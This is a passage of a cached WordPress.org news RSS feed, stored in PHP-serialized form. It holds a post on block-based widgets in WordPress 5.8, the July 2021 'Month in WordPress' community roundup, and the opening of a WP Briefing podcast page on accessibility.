Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:7682:\"\n<p><strong><em>Copy and Design by <a href=\'https://profiles.wordpress.org/critterverse/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>critterverse</a> </em></strong></p>\n\n\n\n<p>WordPress 5.8 brings the power of Gutenberg blocks to widget areas — which means the highly customizable layout and styling options bring you closer to a&nbsp;WYSIWYG editing experience. I made a test site based on the oldie-but-goodie <a href=\"https://wordpress.org/themes/twentysixteen/\">Twenty Sixteen theme</a>, with three separate widget areas. In this post, I’ll highlight a few cool things that are now possible to do with your widgets and where things may be heading next.</p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><a href=\"https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"1130\" src=\"https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?resize=632%2C1130&#038;ssl=1\" alt=\"A zoomed-out view of a single post with one sidebar widget area and two footer widget areas. The site content is about Marine Park Salt Marsh. A List View of blocks floating next to each widget area shows how the design is constructed.\" class=\"wp-image-11116\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?w=2183&amp;ssl=1 2183w, https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?resize=168%2C300&amp;ssl=1 168w, https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?resize=573%2C1024&amp;ssl=1 573w, https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?resize=768%2C1373&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?resize=859%2C1536&amp;ssl=1 859w, https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?resize=1145%2C2048&amp;ssl=1 1145w, https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?w=1264&amp;ssl=1 1264w, https://i0.wp.com/wordpress.org/news/files/2021/08/site-long-1x.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a><figcaption><br><br><br><br></figcaption></figure></div>\n\n\n\n<h2>Create Interesting Visual Effects With Overlapping Layouts and Duotone Images</h2>\n\n\n\n<p>Appearance-wise, users have a lot more control over widget areas than ever before — especially through the use of blocks with customization options like the Cover and Image block. Here’s what I can create in the classic widgets editor (above) versus what I can create in the new block-based widget editor (below).</p>\n\n\n\n<figure class=\"wp-block-video aligncenter\"><video controls src=\"https://wordpress.org/news/files/2021/08/classic-widgets.mov\"></video></figure>\n\n\n\n<figure class=\"wp-block-video aligncenter\"><video controls src=\"https://wordpress.org/news/files/2021/08/block-widgets-1.mov\"></video></figure>\n\n\n\n<h2>Intersperse Widgets and Custom Code Throughout Your Visual Designs</h2>\n\n\n\n<p>Container blocks like Cover and Columns make it easy to weave dynamic or interactive elements into your designs. While this is a given for many widgets, the block versions of widgets can be easily wrapped and layered within container blocks to integrate them into your layout more fully.</p>\n\n\n\n<p>In the example below, I tried placing a Search block in front of a Cover block, which creates a nice layered effect. I also inserted Custom HTML blocks within a Columns block to display different messaging depending on the time of day. (<a href=\"https://stackoverflow.com/questions/31242051/show-content-based-on-time-of-day-timing-changes-on-different-days-of-the-week\">jQuery script</a>)</p>\n\n\n\n<figure class=\"wp-block-video aligncenter\"><video controls src=\"https://wordpress.org/news/files/2021/08/custom-html-1.mov\"></video></figure>\n\n\n\n<h2>Use Traditional Widget Layouts (Or Not) With Lots of Flexibility Over Title and Structure</h2>\n\n\n\n<p>Classic widgets have always had a lockup that includes a widget title. One cool thing about having blocks in widget areas is that you have complete flexibility over how titles appear. For example, you might choose to have a title over every widget, you might only want one title at the top of each widget area, or your design might not need titles at all.</p>\n\n\n\n<p>Note: Some themes, like <a href=\"https://wordpress.org/themes/twentytwentyone/\">Twenty Twenty-One</a>, are designed to flow content horizontally within widget areas. If you’re having trouble with a theme splitting your layout into columns, you could try keeping the lockup together by containing it within a Group block.</p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><a href=\"https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"381\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?resize=632%2C381&#038;ssl=1\" alt=\"Side-by-side comparison of List View of a Sidebar widget area with and without grouped/nested lockups.\" class=\"wp-image-11122\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?w=1760&amp;ssl=1 1760w, https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?resize=300%2C181&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?resize=1024%2C618&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?resize=768%2C463&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?resize=1536%2C927&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/08/grouped.jpg?w=1264&amp;ssl=1 1264w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></div>\n\n\n\n<h2>Copy &amp; Paste Existing Layouts From the WordPress Pattern Directory</h2>\n\n\n\n<p>While patterns haven’t been fully integrated into the widget editors yet, one thing you <em>can</em> do is copy and paste patterns from the game-changing new <a href=\"https://wordpress.org/patterns/\">WordPress Pattern Directory</a> into your site’s widget areas. I used this <a href=\"https://wordpress.org/patterns/pattern/horizontal-call-to-action/\">horizontal call to action</a> pattern from the directory almost exactly as is, with minor color and copy adjustments:</p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><a href=\"https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"389\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?resize=632%2C389&#038;ssl=1\" alt=\"Footer widget area with a black box that reads, “Become a monthly patron” with paragraph text and a “Join now” button in a separate column. A painted image of waves hitting rocks is directly below with no space between them.\n\" class=\"wp-image-11123\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?w=1656&amp;ssl=1 1656w, https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?resize=300%2C185&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?resize=1024%2C630&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?resize=768%2C473&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?resize=1536%2C945&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/08/footer.jpg?w=1264&amp;ssl=1 1264w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a><figcaption><br></figcaption></figure></div>\n\n\n\n<p>FYI: Patterns have not been curated for or integrated into widget areas yet, so you may run into some unexpected behavior — consider this feature to be a preview of what’s coming next for widget editing!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11115\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:57:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"The Month in WordPress: July 2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2021/08/the-month-in-wordpress-july-2021/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Aug 2021 13:53:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11107\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:334:\"WordPress is global in reach and open source in nature. And you would assume that what allows the software to be used by anyone would also enable it to be built by anyone. After all, your location doesn’t matter, and who employs you also doesn’t matter. And your relative social standing certainly shouldn’t matter. As [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Hari Shanker R\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:15215:\"\n<blockquote class=\"wp-block-quote\"><p>WordPress is global in reach and open source in nature. And you would assume that what allows the software to be used by anyone would also enable it to be built by anyone. After all, your location doesn’t matter, and who employs you also doesn’t matter. And your relative social standing certainly shouldn’t matter. As long as you can communicate with the others contributing to the project, there should be no obstacle to your participation.</p></blockquote>\n\n\n\n<p class=\"has-drop-cap\">That was <a href=\"https://profiles.wordpress.org/chanthaboune/\">Josepha Haden</a> on the “<a href=\"https://wordpress.org/news/2021/07/episode-13-cherishing-wordpress-diversity/\">Cherishing WordPress Diversity</a>” episode of the <a href=\"https://wordpress.org/news/podcast/\">WP Briefing Podcast</a>, speaking about the importance of diversity, equity, and inclusion within the fabric of the WordPress project. Her statement captures the spirit of the WordPress open source project, and we hope it resonates with you. Now, let&#8217;s dive in!</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Say hello to WordPress 5.8</h2>\n\n\n\n<p>WordPress <a href=\"https://wordpress.org/news/2020/12/simone/\">version 5.8</a>, “Tatum,” came out on July 20. Version 5.8 is a major release that offers features like block-based widgets, a host of new blocks and patterns, a template editor, a duotone feature to stylize images, theme.json, and support for webP images, to name a few. Read more in the <a href=\"https://wordpress.org/news/2021/07/tatum/\">release post</a>, the <a href=\"https://make.wordpress.org/core/2021/07/03/wordpress-5-8-field-guide/\">field guide</a>, and the <a href=\"https://make.wordpress.org/community/2021/06/18/meetup-group-resources-talking-points-for-wordpress-5-8/\">talking points post for meetup groups</a>. </p>\n\n\n\n<p>Want to contribute to WordPress core?&nbsp;</p>\n\n\n\n<ul><li>Join the&nbsp; <a href=\"https://wordpress.slack.com/archives/C02RQBWTW\">#core</a> channel, follow the <a href=\"https://make.wordpress.org/core/\">Core Team blog</a>, and check out the <a href=\"https://make.wordpress.org/core/handbook/\">team handbook</a>. Don’t miss the Core Team chats on Wednesdays at <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=5&amp;min=00&amp;sec=0\">5 AM</a> and <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=20&amp;min=00&amp;sec=0\">8 PM</a> UTC.</li><li><a href=\"https://translate.wordpress.org/\">Translate WordPress</a> to your local language &#8211; here’s the <a href=\"https://make.wordpress.org/polyglots/2021/07/09/wordpress-5-8-translation-status-july-9-2020/\">latest translation status</a>.</li><li>Contact the Marketing Team in the <a href=\"https://wordpress.slack.com/archives/C0GKJ7TFA\">#marketing</a> slack channel, if you wish to support <a href=\"https://make.wordpress.org/marketing/2021/07/21/social-media-pack-for-5-8-ongoing-collaborations/\">social media engagement around WordPress 5.8</a>.</li></ul>\n\n\n\n<h2>Gutenberg Version 11.0 is released</h2>\n\n\n\n<p>Contributor teams released the <a href=\"https://make.wordpress.org/core/2021/07/09/whats-new-in-gutenberg-11-0-0-9-july/\">11th version</a> of Gutenberg on July 9. <a href=\"https://make.wordpress.org/core/2021/07/09/whats-new-in-gutenberg-11-0-0-9-july/\">Version 11.0</a>, which focuses heavily on backports and bug fixes, showcases some cool features such as an editing overlay for template parts and reusable blocks, and support for CSS shorthand properties in theme.json and block attributes. <a href=\"https://make.wordpress.org/core/2021/07/21/whats-new-in-gutenberg-11-1-0-21-july/\">Version 11.1</a> was also shipped this month, on July 21. The release adds custom block borders as block supports and adds “drag and drop” to the list view.&nbsp;</p>\n\n\n\n<p>Want to get involved in building Gutenberg? Follow <a href=\"https://make.wordpress.org/core/\">the Core Team blog</a>, contribute to <a href=\"https://github.com/WordPress/gutenberg/\">Gutenberg on GitHub</a>, and join the <a href=\"https://wordpress.slack.com/archives/C02QB2JS7\">#core-editor</a> channel in the <a href=\"https://make.wordpress.org/chat/\">Make WordPress Slack</a>. The “<a href=\"https://make.wordpress.org/core/2021/07/21/whats-next-in-gutenberg-site-editing-status-check-late-july-august-2021/\">What’s next in Gutenberg</a>” post offers more details on the latest updates.&nbsp;</p>\n\n\n\n<h2>Returning to in-person WordPress events</h2>\n\n\n\n<p>The Community Team kicked off work to bring back in-person WordPress events. The team <a href=\"https://make.wordpress.org/community/2021/07/01/in-person-meetup-events-for-vaccinated-community-members/#comment-29654\">recently announced</a> that in-person WordPress meetups can be organized in a region if the local public health authority allows in-person events and if the region passes the in-person<a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/2021-returning-to-in-person-meetups/in-person-meetup-decision-checklist/\"> safety checklist</a>. If the region does not meet guidelines on page one of the <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/2021-returning-to-in-person-meetups/in-person-meetup-decision-checklist/\">safety checklist</a>, organizers can plan events for fully vaccinated, recently tested (negative), or recently recovered community members. Subsequently, the team also <a href=\"https://make.wordpress.org/community/2021/07/27/proposal-how-to-return-to-safe-in-person-wordcamps/\">shared a proposal for the return to in-person WordCamps</a> in places that meet the <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/2021-returning-to-in-person-meetups/in-person-meetup-decision-checklist/\">safety guidelines and the vaccination/testing requirements</a>. Please share your feedback on the post if you have any thoughts. For more context, check out the “<a href=\"https://wordpress.org/news/2021/07/episode-12-wordpress-in-person/\">In Person!</a>” episode of the <a href=\"https://wordpress.org/news/podcast/\">WP Briefing Podcast</a>.&nbsp;</p>\n\n\n\n<p>Want to contribute to the Community Team? Follow the <a href=\"https://make.wordpress.org/community/\">Community Team</a> blog, or join them in the <a href=\"https://wordpress.slack.com/archives/C037W5S7X\">#community</a> channel in the Make WordPress Slack.&nbsp;</p>\n\n\n\n<h2>BuddyPress 9.0 is out</h2>\n\n\n\n<p>The BuddyPress team is busy! Within barely a month of their last major release (<a href=\"https://buddypress.org/2021/06/buddypress-8-0-0-alfano/\">version 8.0)</a>, the team shipped <a href=\"https://buddypress.org/2021/07/buddypress-9-0-0-mico/\">version 9.0</a> on July 19. Key features of the release include widget blocks and updates to the BP REST API.&nbsp; Download it from the <a href=\"https://wordpress.org/plugins/buddypress/\">WordPress.org plugin directory</a> or check it out from its <a href=\"https://buddypress.trac.wordpress.org/browser/branches/9.0\">subversion repository.</a> Want to help build BuddyPress? Follow their <a href=\"https://bpdevel.wordpress.com/\">developer relations blog</a>, check out their <a href=\"https://codex.buddypress.org/participate-and-contribute/contribute-with-code/\">handbook page</a>, or join them in the <a href=\"https://wordpress.slack.com/archives/C02RQBYUG\">#buddypress</a> channel in the Make WordPress Slack.</p>\n\n\n\n<h2>WordPress Event updates</h2>\n\n\n\n<ul><li>WordCamp US is coming back on October 1, 2021, <a href=\"https://us.wordcamp.org/2021/wordcamp-us-is-back/\">as a daylong online event</a>!</li><li>Free tickets for <a href=\"https://floripa.wordcamp.org/2021/inscricoes/\">WordCamp Florianopolis</a> (August 11-12) are now available.</li><li>The <a href=\"https://make.wordpress.org/community/tag/wpdiversity/\">Diverse Speaker Training group</a> of the Community Team announced <a href=\"https://make.wordpress.org/community/2021/07/26/announcement-and-call-for-volunteers-expanding-wpdiversity-to-three-programs/\">three new programs</a> for Meetup and WordCamp organizers. Sign up for the <a href=\"https://make.wordpress.org/community/2021/07/30/workshop-august-19-2021-allyship-for-wordpress-event-organizers-amer-emea/\">inaugural allyship program for event organizers</a> on August 19, 2021, at <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210819T1700\">5:00</a> &#8211; <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210819T1900\">7:00 pm</a> UTC!</li><li>The Polyglots Team is planning a <a href=\"https://make.wordpress.org/polyglots/tag/wptranslationday/\">month-long translation day celebration in September 2021</a>, with two weeks of “core events” from September 17 to 30. The team will announce more details on the event shortly, and you <a href=\"https://make.wordpress.org/polyglots/tag/wptranslationday/\">can follow all the latest updates on their P2</a>.&nbsp;</li><li>Stay updated on <a href=\"https://make.wordpress.org/community/events/online/\">online WordPress meetups</a> around the world by following the Marketing Team’s <a href=\"https://www.linkedin.com/company/make-wordpress-marketing-team/\">WordPress Meetup roundup</a> every Monday.&nbsp;</li><li><a href=\"https://santaclarita.wordcamp.org/2021/\">WordCamp Santa Clarita 2021</a> was held online on July 17-18, 2021. The highlight of the event, which had 41 speakers, 19 sponsors, and 672 attendees, was a <a href=\"https://santaclarita.wordcamp.org/2021/schedule/\">dedicated track for WordPress accessibility</a>. Videos of the event will soon be posted on WordPress.tv.</li><li>The Hosting Team organized <a href=\"https://www.meetup.com/wphosting/events/278295555\">their first meetup</a> in June. Check out the <a href=\"https://www.youtube.com/watch?v=V4UCc1Bze5E&amp;t=702s\">event recording</a>.</li></ul>\n\n\n\n<h2>Feedback requests from WordPress contributor teams</h2>\n\n\n\n<p>Please help these WordPress contributor teams by answering their research requests:</p>\n\n\n\n<ul><li>The Core Team has published a <a href=\"https://make.wordpress.org/core/2021/07/28/wordpress-5-8-tatum-retrospective/\">WordPress 5.8 release retrospective</a>. Share your release feedback as <a href=\"https://make.wordpress.org/core/2021/07/28/wordpress-5-8-tatum-retrospective/#respond\">comments on the post</a> or by <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSei8fSLjV0um4hk_1JKwgu-8E6mpNwwxF3j43mInW7lnVOTDw/viewform?usp=sf_link\">filling out this form</a> before August 15. The team is also <a href=\"https://make.wordpress.org/core/2021/07/21/request-for-feedback-updater-proof-of-concept/\">requesting feedback</a> on a “proof of concept” for the new WordPress updater.&nbsp;</li><li>The Training Team wishes to <a href=\"https://make.wordpress.org/training/2021/07/30/learn-wordpress-user-survey-focus-groups/\">find what learners and potential learners would like to see</a> in the <a href=\"https://learn.wordpress.org\">learn.wordpress.org</a> platform. To contribute, please <a href=\"https://www.surveymonkey.com/r/LearnWordPress\">fill out an anonymous survey</a> (by August 13) OR <a href=\"https://forms.gle/jdk2qkkvGyszx1SG6\">join a short video call</a> to share feedback (on the week of August 2-6).</li><li>The Polyglots Team <a href=\"https://make.wordpress.org/polyglots/2021/07/19/polyglots-training-ready-for-testing/\">announced</a> that “Polyglots Training” (a course to help WordPress translators and communities) is now available for testing. <a href=\"https://make.wordpress.org/polyglots/2021/07/19/polyglots-training-ready-for-testing/\">Sign up now</a>!</li><li>The Test Team wants to<a href=\"https://make.wordpress.org/test/2021/07/30/help-shape-the-future-of-theme-design/\"> hear from theme authors</a> on how they use theme.json in order to shape its future. Help them by <a href=\"https://wordpressdotorg.survey.fm/block-theme-author-feedback\">filling out this survey</a> on or before August 13.</li><li>The Marketing Team is doing research on building engagement around WordPress releases. Please help the team by filling out <a href=\"https://forms.gle/4QFhX8fcNxKAfK8y5\">this quick, two-question survey</a> on how you search for release information. If you have any favorite features from the latest release (WordPress 5.8) let the team know by completing this <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSd_2llymf79-h5sgTiprz7Kw4Gr4cbDHh-AAdAQfiArXlHksg/viewform\">short form</a>.</li></ul>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Further reading</h2>\n\n\n\n<ul><li>The Meta Team launched the new <a href=\"https://make.wordpress.org/meta/2021/07/20/the-wordpress-pattern-directory-is-live/\">WordPress Pattern Directory</a> alongside the 5.8 release. The Design Team also contributed to this project, working with contributors on <a href=\"https://make.wordpress.org/design/2021/07/29/initial-patterns-for-the-patterns-directory-launched/\">launching around 85 block patterns in the directory</a>.</li><li>Check out the following blog posts from the Design Team: <a href=\"https://make.wordpress.org/design/2021/07/13/a-walk-around-the-search-block/\">A Walk Around: The Search Block</a> and <a href=\"https://make.wordpress.org/design/2021/07/27/widgets-in-wordpress-5-8-and-beyond/\">Widgets on 5.8 and beyond</a>. Join their <a href=\"https://make.wordpress.org/design/?s=show+and+tell\">Show and Tell meetings</a> on the last Wednesday of each month to learn about updates on their latest projects and new ideas.</li><li>Check out <a href=\"https://wordpress.org/news/2021/07/configuring-theme-design-with-theme-json/\">this blog post</a> to learn how to configure theme design with theme.json.&nbsp;</li><li>The Test Team has put out a <a href=\"https://make.wordpress.org/test/2021/07/20/test-team-reps-call-for-nominations/\">call for team-rep nominations</a>.</li><li>The Themes Team is in the process of discussing <a href=\"https://make.wordpress.org/themes/2021/07/20/discussion-request-for-feedback-on-requirement-changes/\">updated theme directory guidelines</a>.</li><li>Version 17.9 of WordPress for <a href=\"https://make.wordpress.org/mobile/2021/07/27/call-for-testing-wordpress-for-android-17-9/\">Android</a> and <a href=\"https://make.wordpress.org/mobile/2021/07/28/call-for-testing-wordpress-for-ios-17-9/\">iOS</a> are now available for testing.</li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><em>submit it using this form</em></a><em>.&nbsp;</em></p>\n\n\n\n<p><em>The following folks contributed to July’s Month in WordPress:  <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a> <a href=\'https://profiles.wordpress.org/chaion07/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chaion07</a> <a href=\'https://profiles.wordpress.org/jillbinder/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jillbinder</a> <a href=\'https://profiles.wordpress.org/lmurillom/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lmurillom</a> <a href=\'https://profiles.wordpress.org/meher/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>meher</a></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11107\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:58:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WP Briefing: Episode 14: The Art and Science of Accessibility\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wordpress.org/news/2021/08/episode-14-the-art-and-science-of-accessibility/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Aug 2021 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=11096\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:463:\"In this episode, Josepha Haden Chomphosy discusses the nuances of building accessible software, the differences between access, usability, and accessibility, and how this all applies to the WordPress project. Have a question you’d like answered? You can submit them to&#160;wpbriefing@wordpress.org, either written or as a voice recording. Credits Editor:&#160;Dustin Hartzler Logo:&#160;Beatriz Fialho Production:&#160;Chloé Bringmann Transcription: [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2021/07/WP-Briefing-014.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Nicholas Garofalo\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:9393:\"\n<p>In this episode, Josepha Haden Chomphosy discusses the nuances of building accessible software, the differences between access, usability, and accessibility, and how this all applies to the WordPress project.</p>\n\n\n\n<p><em><strong>Have a question you’d like answered? You can submit them to&nbsp;<a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<ul><li>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></li><li>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></li><li>Production:&nbsp;<a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></li><li>Transcription: <a href=\"https://profiles.wordpress.org/eidolonnight/\">Nicholas Garofalo</a></li><li>Song: Fearless First by Kevin MacLeod</li></ul>\n\n\n\n<h2>References</h2>\n\n\n\n<ul><li><a href=\"https://wordpress.org/about/accessibility/\">About WordPress Accessibility</a></li><li><a href=\"https://make.wordpress.org/accessibility/\">Make WordPress Accessibility Team</a></li><li><a href=\"https://twitter.com/wpaccessibility\">WordPress Accessibility Team Twitter</a></li><li><a href=\"https://make.wordpress.org/accessibility/handbook/best-practices/\">WordPress Accessibility Handbook</a></li><li><a href=\"https://developer.wordpress.org/coding-standards/wordpress-coding-standards/accessibility/\">Accessibility Coding Standards</a></li><li><a href=\"https://www.w3.org/WAI/intro/wcag\">Web Content Accessibility Guidelines (WCAG)</a></li><li><a href=\"https://www.a11yproject.com/checklist/\">A11y Checklist</a></li><li><a href=\"https://en.wikipedia.org/wiki/Digital_divide\">The Digital Divide</a></li></ul>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-11096\"></span>\n\n\n\n<p>[contemporary intro music]</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 0:10</p>\n\n\n\n<p>Hello, everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Josepha Haden Chomphosy. Here we go.</p>\n\n\n\n<p>[musical interlude]</p>\n\n\n\n<p><strong>Josepha Haden 